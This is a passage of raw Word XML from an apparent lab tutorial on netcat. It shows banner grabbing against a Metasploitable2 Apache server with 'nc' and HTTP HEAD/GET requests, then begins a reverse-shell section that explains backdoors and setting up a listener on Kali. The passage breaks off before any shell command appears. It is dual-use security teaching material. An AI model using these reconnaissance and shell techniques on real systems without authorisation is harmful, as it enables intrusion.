          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">RAW is insecure. SSH or SSL would secure connection types. Another interesting fact is that RAW connection </w:t>
      </w:r>
      <w:r w:rsidR="00431566">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> must be r</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>unning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> a root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B07F16" w14:textId="7AB04C90" w:rsidR="009E5DBD" w:rsidRPr="009E5DBD" w:rsidRDefault="008568FC" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the RAW connection </w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>to log</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> an anonymous </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003870B" w14:textId="2A192568" w:rsidR="009E5DBD" w:rsidRDefault="009E5DBD" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047DCD85" wp14:editId="4E4A361C">
            <wp:extent cx="4816699" cy="2217946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8860" cy="224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CC7D2" w14:textId="66E2A6B5" w:rsidR="0090617C" w:rsidRDefault="0090617C" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Banner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20225A67" w14:textId="58762C9E" w:rsidR="0090617C" w:rsidRDefault="0090617C" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following command, we can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>create a Raw connection</w:t>
      </w:r>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> running on Metasploitable2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E80B1B" w14:textId="2784679D" w:rsidR="0090617C" w:rsidRDefault="0090617C" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.11 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D87A956" w14:textId="5D283D59" w:rsidR="0090617C" w:rsidRDefault="009B2C42" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>To capture the HTTP banner information, a</w:t>
      </w:r>
      <w:r w:rsidR="0090617C" w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">t the screen, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>type the following command</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>. W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">hen the prompt returns, press enter one more time to see the </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidR="00D22A81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0EC2B7" w14:textId="2D9B77E7" w:rsidR="009B2C42" w:rsidRDefault="009B2C42" w:rsidP="00A600A7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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HEAD / HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40539C81" w14:textId="6BC673D8" w:rsidR="009B2C42" w:rsidRPr="009B2C42" w:rsidRDefault="009B2C42" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>The web</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">server responds with the server banner: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E0E07" w14:textId="2CC61A24" w:rsidR="0015467A" w:rsidRDefault="0090617C" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F35DE4" wp14:editId="21918687">
            <wp:extent cx="2182969" cy="1521326"/>
            <wp:effectExtent l="0" t="0" r="825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930" cy="1547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5B2DD" w14:textId="3757109E" w:rsidR="009B2C42" w:rsidRPr="009B2C42" w:rsidRDefault="009B2C42" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>To retrieve the top-level page on the webserver</w:t>
      </w:r>
      <w:r w:rsidR="00D22A81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>, we must first reestablish the RAW connection and at the prompt</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D22A81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> type</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74161B" w14:textId="70193C15" w:rsidR="002D762F" w:rsidRDefault="009B2C42" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>GET / HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322D5BC" w14:textId="7BA28220" w:rsidR="00D22A81" w:rsidRPr="00D22A81" w:rsidRDefault="00D22A81" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D22A81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D22A81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D22A81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> one more time to see the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA950D9" w14:textId="114ECC1D" w:rsidR="00EF2511" w:rsidRDefault="00D22A81" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BE16970" wp14:editId="0BCD2AA9">
            <wp:extent cx="3116687" cy="1732956"/>
            <wp:effectExtent l="0" t="0" r="762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773" cy="177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92073" w14:textId="2AFAD633" w:rsidR="00EF2511" w:rsidRDefault="00EF2511" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Netcat Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DB809" w14:textId="1BB004BF" w:rsidR="00BC00DE" w:rsidRDefault="00BC00DE" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC00DE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">excellent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">for creating </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC00DE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shells and bind shells. A reverse shell is </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>initiated from the target host back to the attack box</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC00DE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a listening state to pick up the shell. A bind shell is set</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC00DE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>up on the target host and binds to a specific port to listens for an incoming connection from the attack box. In malicious software</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC00DE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> a bind shell is often re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ferred</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC00DE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> to as a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0652AF" w14:textId="4A2E7DD6" w:rsidR="00BC00DE" w:rsidRDefault="00CA4827" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4827">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Let us assume we have remote command execution on the target host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>up a listener using a terminal on ou</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack machine (kali) using the following command.</w:t>
      </w:r>
    </w:p>
